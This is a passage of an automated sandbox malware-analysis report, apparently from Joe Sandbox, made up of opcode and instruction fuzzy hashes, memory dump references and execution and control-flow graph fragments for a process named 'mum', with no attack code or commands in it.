                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 35043d7db2149fbb5ded89d5204d0eca888b1563e2c45fb65e4bf28bd9548e03
                                      • Instruction ID: 0b6293716d2ae1b2b3a119991f31c58440f12b261aedf3c2bd6792b9dc090e51
                                      • Opcode Fuzzy Hash: 35043d7db2149fbb5ded89d5204d0eca888b1563e2c45fb65e4bf28bd9548e03
                                      • Instruction Fuzzy Hash: EEE04F308492489FCB05CBA8989599EBF70AB47211F1451DED905632A1D7740D0ADB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0e7f46c4f5225c2e7124dfab6ec7ae35d7ba26067f2181748472d2a4cc684c3
                                      • Instruction ID: 31bfe581ee236efe2da4a642298bcc59e8a025b90c1493c975601a969e9545eb
                                      • Opcode Fuzzy Hash: b0e7f46c4f5225c2e7124dfab6ec7ae35d7ba26067f2181748472d2a4cc684c3
                                      • Instruction Fuzzy Hash: 24E04830800208EFCB04EF94D90959DBB75FF46301F548154E84853350C7705E64DF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9c652eeeb1b9487a6b85859c72829a353421d1aacc8e483d1402ab1caf6bf552
                                      • Instruction ID: 378b8add7a33692ca446915783695bb910982e6e3379c6f48d67b8f6fab818e3
                                      • Opcode Fuzzy Hash: 9c652eeeb1b9487a6b85859c72829a353421d1aacc8e483d1402ab1caf6bf552
                                      • Instruction Fuzzy Hash: BDE0123060A3899FC702DF68D9509AC7FB4DF8620471145EED086D7655D7311E558B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f7e892c6144c2cc7835c73e202295c5b41c81c2394ea47d42b0fcc762fe09bad
                                      • Instruction ID: 811ce4496e856a10f18ed2bb601734d5a865491043bf3610bd43884e169d0c5f
                                      • Opcode Fuzzy Hash: f7e892c6144c2cc7835c73e202295c5b41c81c2394ea47d42b0fcc762fe09bad
                                      • Instruction Fuzzy Hash: 4AE0C238904208EFCB04DF98D48499CBBB4FB48314F5081A9E94567360C731AE94DF80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f319deeeca5e31327df8db2d103bfb531b2c22f2f119e41594ca24875bcd2f87
                                      • Instruction ID: 150b25e15cf0ef21eccbb8520cad255b3970fa028a804d44a6c1cb4a1b53ed77
                                      • Opcode Fuzzy Hash: f319deeeca5e31327df8db2d103bfb531b2c22f2f119e41594ca24875bcd2f87
                                      • Instruction Fuzzy Hash: 2EE01270E0420CEFCB04DFA9D440A9EFBB5EB48300F1082AAE904A3360D7359E54DF81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
                                      • Instruction ID: d94f413e1be07b388da9a3b55062ea688eede7a87fd9b94361b64be31d3d8b88
                                      • Opcode Fuzzy Hash: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
                                      • Instruction Fuzzy Hash: 31F09274E14208DFDB64CFB8C89089CBBB0AF09304B24865ED815A7342D731A812EF04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7dc9631e83244edfa9541dd039716eba80c4e7d1abfcb36947a87f717e8e0270
                                      • Instruction ID: 22edce6d4c1b2c07564320ad5c95c2e5f76a5577fc81d8d04ccb423c93db828d
                                      • Opcode Fuzzy Hash: 7dc9631e83244edfa9541dd039716eba80c4e7d1abfcb36947a87f717e8e0270
                                      • Instruction Fuzzy Hash: ADE01A74D04208EFCB04DF99D440AACFBB4EB48310F14C1AAEC5463351C6319E51EF84
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 66ebd5620dffa75dec804505021eb3e39d6ac6bf8a636ba8f0ab42267000764c
                                      • Instruction ID: bafcf8f2ce9510c8c4b85ccc0dad79bcff17854ea8999f0d4165640d5ecfb1cf
                                      • Opcode Fuzzy Hash: 66ebd5620dffa75dec804505021eb3e39d6ac6bf8a636ba8f0ab42267000764c
                                      • Instruction Fuzzy Hash: F9E01234904208EFCB04DFA8D884A9DBBB4BB09321F109198E90527360CB71AEA4EF80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 07873fb76ae53a52951e7c5ecffe6034cc9710701e3f855bdfd33345c8c73442
                                      • Instruction ID: 65f079009cced0036ad54bc63aca684a36bf5ad7342d9b10fe07ce14b45b2027
                                      • Opcode Fuzzy Hash: 07873fb76ae53a52951e7c5ecffe6034cc9710701e3f855bdfd33345c8c73442
                                      • Instruction Fuzzy Hash: F8E01230E0420CEFDB44EFE8D84169DBBB4AB44300F1081A9D828A3350D7345A44DF80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 86d3077da203ae8025b8d6ee9a3f2061263225dc59d07a4c7d4517b0425415f1
                                      • Instruction ID: f1cc31f56948edd9d36d1d7028b62061b04b2b5f9a23e660cc0c54d57b283209
                                      • Opcode Fuzzy Hash: 86d3077da203ae8025b8d6ee9a3f2061263225dc59d07a4c7d4517b0425415f1
                                      • Instruction Fuzzy Hash: 89F0FDB49012A88FDBA4CF18CD94A9DBBB6BB58301F0041DADA0EA3251EB701EC5CF04
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a6184dcbfcda5b5ec855c522077e48e519a5234640d878e0814616eb232fc3e0
                                      • Instruction ID: 2511fd577d68711d80cd617b3b31b431a80ad0940a3e5aba746070c2fa6a2656
                                      • Opcode Fuzzy Hash: a6184dcbfcda5b5ec855c522077e48e519a5234640d878e0814616eb232fc3e0
                                      • Instruction Fuzzy Hash: 43E0E270914208EFCB44EFACD98969DBBB4EB04201F1045A9D808A3350EB705A88EB81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 31fcb57e6b13beef355698891e48a9746345be8b7dd46640cde1dab2eaf457d9
                                      • Instruction ID: f4dc0f54df29e80d17199b9df08f463a9a09fe80faf76a26a9ac22929e4c225b
                                      • Opcode Fuzzy Hash: 31fcb57e6b13beef355698891e48a9746345be8b7dd46640cde1dab2eaf457d9
                                      • Instruction Fuzzy Hash: A2E0E534910209CFEB20DFB8D8489ACBBB1FB58300F20462EE412A3295DBB40985AF42
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 231c34387925a25657b08e7a20a6517f329602bd6b9ef3d3e29fad864cbaa62f
                                      • Instruction ID: 3989b1f7bc6f3f4d30711eadb90bc245417c57b9c0fd123132c31820e10c7939
                                      • Opcode Fuzzy Hash: 231c34387925a25657b08e7a20a6517f329602bd6b9ef3d3e29fad864cbaa62f
                                      • Instruction Fuzzy Hash: 11C0121130453A124D6932F81413A7F31494E8046A300103DD20F5B3D1DF2E9D0302FE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 03636c7d38e1d5813fb06140c6d1e9c51c7cc7ddf3bd01e72ca39e5f30230880
                                      • Instruction ID: 18fa5c982dd3f82e5767db6317501efee5720408864b2d9637002a737667ca46
                                      • Opcode Fuzzy Hash: 03636c7d38e1d5813fb06140c6d1e9c51c7cc7ddf3bd01e72ca39e5f30230880
                                      • Instruction Fuzzy Hash: 7AD05E70A0120DEFCB40EFA8EA4189DB7B9EB44204B1045A9E409E7310EB712F219BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 44b6a22bdda2b5cc7452f1741ab3e5605a18481f8ccd46c1460fbb3c54dd8431
                                      • Instruction ID: 35e597b1aa78277ca842be869a08db4cb881f62c3ceb110dd7fb19f4e54d2c41
                                      • Opcode Fuzzy Hash: 44b6a22bdda2b5cc7452f1741ab3e5605a18481f8ccd46c1460fbb3c54dd8431
                                      • Instruction Fuzzy Hash: DDD05BB480412CCFDB10CF60C848786B7F1FB10300F0450E6C8556B202DB3607559F61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_5350000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1a1e5e6c699c4577a1f24e1c8f4ae5e54867ffa5d097c56ac669652ec9cab9c1
                                      • Instruction ID: 787ba3b80f0aee90999bb5baaeba3a7d72e3829e64a176a1077bbafb66f37af3
                                      • Opcode Fuzzy Hash: 1a1e5e6c699c4577a1f24e1c8f4ae5e54867ffa5d097c56ac669652ec9cab9c1
                                      • Instruction Fuzzy Hash: 92E09A70915219CFDB60DF14DC44BD9B776BB54314F005596E40AA7250DBB11BD5CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 19a3358f1a48ee49cedee73e8cb4395534348eac6067eb0e7f39c8e498e79cc5
                                      • Instruction ID: d74aa9d6b599cd0df72551143960cd0d22127a42a154f0e28a083ee8b36a4ea3
                                      • Opcode Fuzzy Hash: 19a3358f1a48ee49cedee73e8cb4395534348eac6067eb0e7f39c8e498e79cc5
                                      • Instruction Fuzzy Hash: 51D017B1C18249CBDB60CF65E8148AEBB70FF0A344F10911AC83563292C33405119F02
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9e29c314bdb78890d92b90aacd07e9d4ae17b41d55096b2c0bb3420d534f42d0
                                      • Instruction ID: 60208c2e5a510d04a8e2dff3741a0bbfe6c836dd58f52fcadd6cab445dbe9c6b
                                      • Opcode Fuzzy Hash: 9e29c314bdb78890d92b90aacd07e9d4ae17b41d55096b2c0bb3420d534f42d0
                                      • Instruction Fuzzy Hash: 1AC02B303497018ED3514FF41C042143B8C5E1400434040B5E48CC0823F4008C600302
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a7030df30ed4e57585759ad0bec5ec0ed4c7205962b7eece30e1608d1aeb6d52
                                      • Instruction ID: 56887201826d02c615c8ca674d1280e1a7ece81a2e33c256ced96635bcc84b11
                                      • Opcode Fuzzy Hash: a7030df30ed4e57585759ad0bec5ec0ed4c7205962b7eece30e1608d1aeb6d52
                                      • Instruction Fuzzy Hash: FCD0CAB8C2820ACBCB14CFA2E9848AEBBB0BB04350B20041A9406A3200C7701A60AE81
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_270000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c8c1a86c4fa23e1c7a3d62b33afc17b9e499e3523123a256fe42331e0ffc21d7
                                      • Instruction ID: 82611be8f379e667fbb2449ff0b642483ddc9c3c5498d58d2102c00931a6fa0d
                                      • Opcode Fuzzy Hash: c8c1a86c4fa23e1c7a3d62b33afc17b9e499e3523123a256fe42331e0ffc21d7
                                      • Instruction Fuzzy Hash: 21B012303157094A66905FB62D0461277CC5E105043400460A80CC0400F910D8200141
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:20.2%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:227
                                      Total number of Limit Nodes:16
                                      execution_graph 9808 1c1548 9809 1c1564 9808->9809 9906 1c2620 9809->9906 9810 1c1599 9910 1c4758 9810->9910 9814 1c15d1 9930 1cce88 9814->9930 9819 1c15f4 9953 1ce440 9819->9953 9826 1c1625 9985 2e04a0 9826->9985 9989 2e0490 9826->9989 9827 1c162c 9993 2e08e8 9827->9993 9997 2e08f8 9827->9997 9828 1c1633 10001 2e0d50 9828->10001 10005 2e0d41 9828->10005 9829 1c163a 10009 2e11a8 9829->10009 10013 2e1198 9829->10013 9830 1c1641 10017 2e1600 9830->10017 10021 2e15f1 9830->10021 9831 1c1648 10025 2e1a4a 9831->10025 10029 2e1a58 9831->10029 9832 1c164f 10033 2e5258 9832->10033 9835 1c1691 10049 2e5f78 9835->10049 10053 2e5f88 9835->10053 9836 1c1698 10057 2e63e0 9836->10057 10061 2e63d1 9836->10061 9837 1c169f 10065 2e6828 9837->10065 10069 2e6838 9837->10069 9838 1c16a6 10073 2e6c90 9838->10073 10077 2e6c80 9838->10077 9839 1c16ad 10081 2e7110 9839->10081 10085 2e7102 9839->10085 9840 1c16bb 10089 2e7568 9840->10089 10093 2e7558 9840->10093 9841 1c16c2 10097 2e79c0 9841->10097 10101 2e79b1 9841->10101 9842 1c16c9 10105 2e7e18 9842->10105 10109 2e7e09 9842->10109 9843 1c16d0 10113 2e8260 9843->10113 10117 2e8270 9843->10117 9844 1c16d7 10121 2e86c8 9844->10121 10125 2e86b8 9844->10125 9845 1c16de 10129 2e8b20 9845->10129 10133 2e8b10 9845->10133 9846 1c16e5 10137 2e8f78 9846->10137 10141 2e8f69 9846->10141 9847 1c16ec 9907 1c2634 KiUserExceptionDispatcher 9906->9907 9909 1c270e 9907->9909 9909->9810 9912 1c478a 9910->9912 9911 1c15bc 9915 1cc17f 9911->9915 9912->9911 10145 1cbbf8 9912->10145 10149 1cbd93 9912->10149 9918 1cc187 9915->9918 9916 1c15c3 9919 1cc5e2 9916->9919 9917 1cbbf8 KiUserExceptionDispatcher 9917->9918 9918->9916 9918->9917 9922 1cc60a 9919->9922 9920 1c15ca 9923 1cca30 9920->9923 9921 1cbbf8 KiUserExceptionDispatcher 9921->9922 9922->9920 9922->9921 9928 1cc704 9923->9928 9929 1cca3a 9923->9929 9924 1cc9e9 9924->9814 9925 1cbbf8 KiUserExceptionDispatcher 9925->9928 9926 1cce41 9926->9814 9927 1cbbf8 KiUserExceptionDispatcher 9927->9929 9928->9924 9928->9925 9929->9926 9929->9927 9933 1cceba 9930->9933 9931 1c15d8 9934 1cd2e0 9931->9934 9932 1cbbf8 KiUserExceptionDispatcher 9932->9933 9933->9931 9933->9932 9935 1cd312 9934->9935 9936 1c15df 9935->9936 9937 1cbbf8 KiUserExceptionDispatcher 9935->9937 9938 1cd738 9936->9938 9937->9935 9941 1cd76a 9938->9941 9939 1c15e6 9942 1cdb90 9939->9942 9940 1cbbf8 KiUserExceptionDispatcher 9940->9941 9941->9939 9941->9940 9944 1cdbc2 9942->9944 9943 1c15ed 9946 1cdfe8 9943->9946 9944->9943 9945 1cbbf8 KiUserExceptionDispatcher 9944->9945 9945->9944 9951 1cdcbc 9946->9951 9952 1cdff2 9946->9952 9947 1cdfa1 9947->9819 9948 1cbbf8 KiUserExceptionDispatcher 9948->9951 9949 1ce3f9 9949->9819 9950 1cbbf8 KiUserExceptionDispatcher 9950->9952 9951->9947 9951->9948 9952->9949 9952->9950 9956 1ce472 9953->9956 9954 1c15fb 9957 1ce89a 9954->9957 9955 1cbbf8 KiUserExceptionDispatcher 9955->9956 9956->9954 9956->9955 9960 1ce8ca 9957->9960 9958 1c1602 9961 1cecf0 9958->9961 9959 1cbbf8 KiUserExceptionDispatcher 9959->9960 9960->9958 9960->9959 9964 1ced22 9961->9964 9962 1c1609 9965 1cf148 9962->9965 9963 1cbbf8 KiUserExceptionDispatcher 9963->9964 9964->9962 9964->9963 9968 1cf17a 9965->9968 9966 1c1610 9969 1cf5a2 9966->9969 9967 1cbbf8 KiUserExceptionDispatcher 9967->9968 9968->9966 9968->9967 9972 1cf5d2 9969->9972 9970 1c1617 9973 1cf9fa 9970->9973 9971 1cbbf8 KiUserExceptionDispatcher 9971->9972 9972->9970 9972->9971 9976 1cfa0c 9973->9976 9974 1c161e 9977 2e0048 9974->9977 9981 2e0012 9974->9981 9975 1cbbf8 KiUserExceptionDispatcher 9975->9976 9976->9974 9976->9975 9978 2e006a KiUserExceptionDispatcher 9977->9978 9980 2e0124 9978->9980 9980->9826 9982 2e0018 KiUserExceptionDispatcher 9981->9982 9984 2e0124 9982->9984 9984->9826 9986 2e04c2 KiUserExceptionDispatcher 9985->9986 9988 2e057c 9986->9988 9988->9827 9990 2e04c2 KiUserExceptionDispatcher 9989->9990 9992 2e057c 9990->9992 9992->9827 9994 2e091a KiUserExceptionDispatcher 9993->9994 9996 2e09d4 9994->9996 9996->9828 9998 2e091a KiUserExceptionDispatcher 9997->9998 10000 2e09d4 9998->10000 10000->9828 10002 2e0d72 KiUserExceptionDispatcher 10001->10002 10004 2e0e2c 10002->10004 10004->9829 10006 2e0d54 KiUserExceptionDispatcher 10005->10006 10008 2e0e2c 10006->10008 10008->9829 10010 2e11ca KiUserExceptionDispatcher 10009->10010 10012 2e1284 10010->10012 10012->9830 10014 2e11ca KiUserExceptionDispatcher 10013->10014 10016 2e1284 10014->10016 10016->9830 10018 2e1622 KiUserExceptionDispatcher 10017->10018 10020 2e16dc 10018->10020 10020->9831 10022 2e15fd KiUserExceptionDispatcher 10021->10022 10024 2e16dc 10022->10024 10024->9831 10026 2e1a5c KiUserExceptionDispatcher 10025->10026 10028 2e1b34 10026->10028 10028->9832 10030 2e1a7a KiUserExceptionDispatcher 10029->10030 10032 2e1b34 10030->10032 10032->9832 10034 2e527a KiUserExceptionDispatcher 10033->10034 10036 1c167c 10034->10036 10037 2e56d8 10036->10037 10038 2e56fa KiUserExceptionDispatcher 10037->10038 10040 1c168a 10038->10040 10041 2e5b20 10040->10041 10045 2e5b30 10040->10045 10042 2e5b52 KiUserExceptionDispatcher 10041->10042 10044 2e5c0c 10042->10044 10044->9835 10046 2e5b52 KiUserExceptionDispatcher 10045->10046 10048 2e5c0c 10046->10048 10048->9835 10050 2e5f85 KiUserExceptionDispatcher 10049->10050 10052 2e6064 10050->10052 10052->9836 10054 2e5faa KiUserExceptionDispatcher 10053->10054 10056 2e6064 10054->10056 10056->9836 10058 2e6402 KiUserExceptionDispatcher 10057->10058 10060 2e64bc 10058->10060 10060->9837 10062 2e6402 KiUserExceptionDispatcher 10061->10062 10064 2e64bc 10062->10064 10064->9837 10066 2e685a KiUserExceptionDispatcher 10065->10066 10068 2e6914 10066->10068 10068->9838 10070 2e685a KiUserExceptionDispatcher 10069->10070 10072 2e6914 10070->10072 10072->9838 10074 2e6cb2 KiUserExceptionDispatcher 10073->10074 10076 2e6d6c 10074->10076 10076->9839 10078 2e6cb2 KiUserExceptionDispatcher 10077->10078 10080 2e6d6c 10078->10080 10080->9839 10082 2e7132 KiUserExceptionDispatcher 10081->10082 10084 2e71ed 10082->10084 10084->9840 10086 2e7132 KiUserExceptionDispatcher 10085->10086 10088 2e71ed 10086->10088 10088->9840 10090 2e758a KiUserExceptionDispatcher 10089->10090 10092 2e7644 10090->10092 10092->9841 10094 2e758a KiUserExceptionDispatcher 10093->10094 10096 2e7644 10094->10096 10096->9841 10098 2e79e2 KiUserExceptionDispatcher 10097->10098 10100 2e7a9c 10098->10100 10100->9842 10102 2e79e2 KiUserExceptionDispatcher 10101->10102 10104 2e7a9c 10102->10104 10104->9842 10106 2e7e3a KiUserExceptionDispatcher 10105->10106 10108 2e7ef4 10106->10108 10108->9843 10110 2e7e3a KiUserExceptionDispatcher 10109->10110 10112 2e7ef4 10110->10112 10112->9843 10114 2e8292 KiUserExceptionDispatcher 10113->10114 10116 2e834c 10114->10116 10116->9844 10118 2e8292 KiUserExceptionDispatcher 10117->10118 10120 2e834c 10118->10120 10120->9844 10122 2e86ea KiUserExceptionDispatcher 10121->10122 10124 2e87a4 10122->10124 10124->9845 10126 2e86ea KiUserExceptionDispatcher 10125->10126 10128 2e87a4 10126->10128 10128->9845 10130 2e8b42 KiUserExceptionDispatcher 10129->10130 10132 2e8bfc 10130->10132 10132->9846 10134 2e8b24 KiUserExceptionDispatcher 10133->10134 10136 2e8bfc 10134->10136 10136->9846 10138 2e8f9a KiUserExceptionDispatcher 10137->10138 10140 2e9054 10138->10140 10140->9847 10142 2e8f7c KiUserExceptionDispatcher 10141->10142 10144 2e9054 10142->10144 10144->9847 10147 1cbc1f 10145->10147 10146 1cbd4a KiUserExceptionDispatcher 10148 1cbd3b 10146->10148 10147->10146 10147->10148 10148->9912 10152 1cbc57 10149->10152 10150 1cbd4a KiUserExceptionDispatcher 10151 1cbd3b 10150->10151 10151->9912 10152->10150 10152->10151

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 972 1c2620-1c2650 974 1c2657-1c271c KiUserExceptionDispatcher 972->974 975 1c2652 972->975 981 1c2a3a-1c2a6c 974->981 982 1c2722-1c273a 974->982 975->974 985 1c273c 982->985 986 1c2741-1c274a 982->986 985->986 987 1c2a2d-1c2a33 986->987 988 1c274f-1c27c9 987->988 989 1c2a39 987->989 994 1c27cf-1c283d 988->994 995 1c2885-1c28e0 988->995 989->981 1004 1c283f-1c287f 994->1004 1005 1c2880-1c2883 994->1005 1006 1c28e1-1c292f 995->1006 1004->1005 1005->1006 1011 1c2a18-1c2a23 1006->1011 1012 1c2935-1c2a17 1006->1012 1013 1c2a2a 1011->1013 1014 1c2a25 1011->1014 1012->1011 1013->987 1014->1013
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 001C26FC
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1275842790.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_1c0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: f91345ccb3553325f9c217aef921643cd90b3b20dcd0f7f0689d3895fab83364
                                      • Instruction ID: b894c24e11c0e6bd105357ed7a4315224460bb9bcddf65f8c339b376f9195c3e
                                      • Opcode Fuzzy Hash: f91345ccb3553325f9c217aef921643cd90b3b20dcd0f7f0689d3895fab83364
                                      • Instruction Fuzzy Hash: E6D1C174E00218CFDB14DFA5C994B9DBBB2BF89305F2480AAD809A7365DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E8BEB
                                      Memory Dump Source
                                      • Source File: 0000001A.00000002.1277297344.00000000002E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002E0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_26_2_2e0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 6a65f336d8b0f6733a90282d9abb9f4ab5a6b1512f252b46803ed8704c6e4a82
                                      • Instruction ID: 74f8ff803db577d58abe5473412506e472257989c318474e9792b52f41141e4a
                                      • Opcode Fuzzy Hash: 6a65f336d8b0f6733a90282d9abb9f4ab5a6b1512f252b46803ed8704c6e4a82
                                      • Instruction Fuzzy Hash: EBC1D174E00218CFDB14DFA5C994B9DBBB2BF89304F6090AAD409AB359DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1675 2e6838-2e6858 1676 2e685f-2e690c KiUserExceptionDispatcher 1675->1676 1677 2e685a 1675->1677 1682 2e6914-2e6922 1676->1682 1677->1676 1683 2e6c3a-2e6c6c 1682->1683 1684 2e6928-2e693f 1682->1684 1687 2e6946-2e694f 1684->1687 1688 2e6941 1684->1688 1689 2e6c2d-2e6c33 1687->1689 1688->1687 1690 2e6c39 1689->1690 1691 2e6954-2e69ca 1689->1691 1690->1683 1696 2e6a86-2e6ae0 1691->1696 1697 2e69d0-2e6a3e 1691->1697 1708 2e6ae1-2e6b2f 1696->1708 1706 2e6a40-2e6a80 1697->1706 1707 2e6a81-2e6a84 1697->1707 1706->1707 1707->1708 1713 2e6c18-2e6c23 1708->1713 1714 2e6b35-2e6c17 1708->1714 1715 2e6c2a 1713->1715 1716 2e6c25 1713->1716 1714->1713 1715->1689 1716->1715
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002E6903
                                      Memory Dump Source
